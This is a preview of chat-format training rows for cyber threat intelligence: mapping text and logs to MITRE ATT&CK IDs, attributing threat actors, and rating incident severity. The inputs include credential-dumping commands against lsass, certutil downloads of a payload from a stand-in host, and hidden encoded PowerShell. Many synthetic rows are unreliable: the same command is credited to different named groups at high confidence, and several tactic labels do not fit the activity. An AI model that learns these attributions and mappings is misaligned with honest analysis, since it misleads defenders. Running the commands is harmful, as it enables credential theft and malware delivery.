messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-TJS02Z0YRV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3236 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: An APT19 HTTP malware variant establishes persistence by setting the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Debug Tools-%LOCALAPPDATA%\\.", "role": "user" }, { "content": "{\"tactics\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spi...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The code comparison specifically shows the HighShell code including a salt variable containing di2zag7wZHTK9YR0NGq, which is not present within the TwoFace code on the left", "role": "user" }, { "content"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-5G22QKEJRZ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance", "role": "user" }, { "con...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Nebulae has the ability to delete files and directories.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2420 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"conf...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1338 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.38.2.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0010\", \"TA0043\"], \"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-RSQ6470386)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Privilege Escalation, Collection", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assista...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BBSRAT can delete files and directories.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typh...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-LOXHX97OTW)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Initial Access, Impact", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1430 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DustySky can delete files it creates from the infected system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cobian RAT has a feature to perform keylogging on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assis...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.105.180.37", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"T...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DustySky lists all installed software for the infected machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3218 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: During our analysis, we observed one loader running “rr.exe” with the following arguments:open cmd.exe /c c:\\\\temp\\\\rr.exe SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run \"C:\\DOCUME~1\\ADMINI~1\\LOCAL...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-MWNB847GDD)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"High...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3865 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.139.125.25", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Penquin can use the command code do_vslist to send file names, size, and status to C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-5N6QRR9847)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Initial Access", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.154.86.46", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0011\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.171.67.144", "role": "user" }, { "content": "{\"tactics\": [...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.21.120.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0004\", \"TA0006\"], \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GoldenSpy has exfiltrated host environment information to an external C2 domain via port 9006.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "ass...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.28.249.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0011\", \"TA0008\"], ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3413 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.16.22.156", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0008\"], \"technique...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Emotet has been observed leveraging a module that scrapes email data from Outlook.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1114\", \"T1114.001\"]}", "role": "...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-DV20A9IIER)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Execution, Reconnaissance", "role": "user" }, { "content": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.78.15.142", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0007...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-7HSNBO117B)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has used JScript for logging and downloading additional tools.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-4N3EW21EB6)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Night Dragon has disabled anti-virus and anti-spyware tools in some instances on the victim’s machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1562\"]}"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \"Hi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-5W6P731YN0)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Reconnaissance, Execution", "role": "user" }, { "...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Peirates can use kubectl or the Kubernetes API to run commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1609\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1356 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.114.154.126", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TrickBot has the ability to capture RDP credentials by capturing the CredEnumerateA API", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.004\", \"T1056\"]...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.34.95.141", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0002\"], \"techniques\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-L0O8OC5AU8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: InvisiMole has used TCP to download additional modules.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1095\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with \"GC/\") by computers not present in the DC organizational unit (OU).", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2580 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-Y8IBWZ837R)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Impact, Lateral Movement", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2891 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.125.115.24", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniq...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 768 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1017 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.28.126.191", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0001\", \"TA0008\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.88.175.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0009\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-1W07M4B2ZL)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Collection, Credential Access", "role": "user" }, { "content": "{...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Tropic Trooper has encrypted traffic with the C2 to prevent network detection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-NQAKOHZU34)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Lateral Movement", "role": "user" }, { "conten...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Figure 4: Execution Workflow Section of v.vbs After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn execute...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1486\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-EPUSN5DGIP)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.182.124.147", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniq...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Carberp can capture display screenshots with the screens_dll.dll plugin.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.166.234.229", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.83.49.192", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1570...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-PM5U5DNPQH)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: AppleSeed can zip and encrypt data collected on a target system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.001\", \"T1560\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1549 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BLINDINGCAN has downloaded files to a victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-Q9SNG8FBW5)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Privilege Escalation", "role": "user" }, { "content": "{\"seve...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.", "role"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.65.189.69", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-QEYVDKMVPN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Reconnaissance, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"con...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1827 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.103.226.237", "role": "user" }, { "content": "{\"tactics\": [\"TA0011...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Bisonal has added itself to the Registry key HKEY_CURRENT_USER\\Software\\Microsoft\\CurrentVersion\\Run\\ for persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: AppleJeus has waited a specified time before downloading a second stage payload.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.003\"]}", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GoldenSpy has gathered operating system information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT29 has written malware variants in Visual Basic.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor executed commands and arguments that may employ various means to detect and avoid debugged environments.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1622\"]}", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-J6K5YARO5W)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Lateral Movement, Exfiltration", "role": "user" }, {...